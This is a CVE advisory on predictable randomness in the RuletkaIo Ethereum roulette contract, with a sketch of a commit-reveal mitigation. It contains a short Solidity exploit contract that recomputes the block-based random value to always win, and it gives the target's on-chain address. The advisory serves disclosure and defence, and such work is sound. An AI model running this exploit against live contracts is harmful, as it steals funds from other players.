CVE-2018-17968
Vendor
RuletkaIo
Vulnerability Type
Bad Randomness
Abstract
A gambling smart contract implementation for RuletkaIo, an Ethereum gambling game, generates a random value that is predictable by an external contract call. The developer wrote a random() function that uses a block timestamp and block hash from the Ethereum blockchain. This can be predicted by writing the same random function code in an exploit contract to determine the deadSeat value.
Details
It is a roulette game. A total of six people can enter a room. When six people have placed a bet and the room is full, the contract executes the "executeRoom" function and the "random()" function and stores the result in a variable called "deadSeat". It then runs the distributeFunds function with the "deadSeat" variable as the argument and gives the winning prizes to the players whose number is not "deadSeat". However, the "random()" function uses blockhash and block timestamp, which can be calculated by an external contract (Line 177). This means the "deadSeat" value is always known, which allows an attacker to always win.
Exploit
contract attack{
    function attack(address _target, uint256 roomId, uint256 s_idx, uint256 amount) public payable{
        address[] players;
        uint256 entryPrice;
        RuletkaIo target = RuletkaIo(_target);
        uint256 rand = uint256(uint256(keccak256(block.timestamp, block.difficulty)))%6;
        if(rand < s_idx){
            for(uint256 i = s_idx; i<6; i++){
                target.enter.value(amount)(roomId);
            }
        }
        msg.sender.transfer(this.balance);
    }
}
Conclusion
It is hard to generate secure random numbers in Solidity. Check out the other "Bad Randomness" CVEs in our list at https://github.com/TEAM-C4B/CVE-LIST.
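One way to stop deriving "deadSeat" from block fields is a commit-reveal scheme, sketched here as an added example that is not RuletkaIo's code or the discoverers'. It targets Solidity 0.8 and covers only dead-seat selection for one six-seat room; the contract name, function names and the one-hour reveal window are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not RuletkaIo code; every name in it is hypothetical.
contract CommitRevealRoom {
    uint256 public constant SEATS = 6;
    uint256 public constant REVEAL_WINDOW = 1 hours; // assumed value
    address[] public players;
    mapping(address => bytes32) public commitment;
    mapping(address => bool) public revealed;
    uint256 public reveals;
    uint256 public revealDeadline;
    uint256 public deadSeat;
    bool public settled;
    bytes32 private seed;

    // c = keccak256(abi.encodePacked(secret, msg.sender)), computed off-chain
    // from 32 random bytes; binding to msg.sender stops commitment copying.
    function enter(bytes32 c) external {
        require(players.length < SEATS, "room full");
        require(c != bytes32(0) && commitment[msg.sender] == bytes32(0), "bad commitment");
        commitment[msg.sender] = c;
        players.push(msg.sender);
        if (players.length == SEATS) revealDeadline = block.timestamp + REVEAL_WINDOW;
    }

    // Reveals open only when all six seats are taken, so nobody can pick
    // a seat after seeing another player's secret.
    function reveal(bytes32 secret) external {
        require(players.length == SEATS && !settled, "not in reveal phase");
        require(!revealed[msg.sender], "already revealed");
        require(keccak256(abi.encodePacked(secret, msg.sender)) == commitment[msg.sender], "mismatch");
        revealed[msg.sender] = true;
        seed ^= secret; // order-independent mix of all six secrets
        if (++reveals == SEATS) {
            deadSeat = uint256(keccak256(abi.encodePacked(seed))) % SEATS;
            settled = true;
        }
    }

    // Withholding a reveal cannot help: after the deadline the first
    // seat that stayed silent becomes the dead seat.
    function timeout() external {
        require(players.length == SEATS && !settled, "not in reveal phase");
        require(block.timestamp > revealDeadline, "reveal window still open");
        for (uint256 i = 0; i < SEATS; i++) {
            if (!revealed[players[i]]) { deadSeat = i; settled = true; return; }
        }
    }
}
```

Because the seed depends on six secrets that are fixed before any of them is revealed, a contract calling in the same block has no block-derived value to recompute, unlike the expression in the exploit above.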
Reference
Official Website https://www.ruletka.io/
Dappradar https://dappradar.com/app/808/ruletka
Explorer https://etherscan.io/address/0xef02c45c5913629dd12e7a9446455049775eec32
Code https://etherscan.io/address/0xef02c45c5913629dd12e7a9446455049775eec32#code
Discoverer
Team Code4Block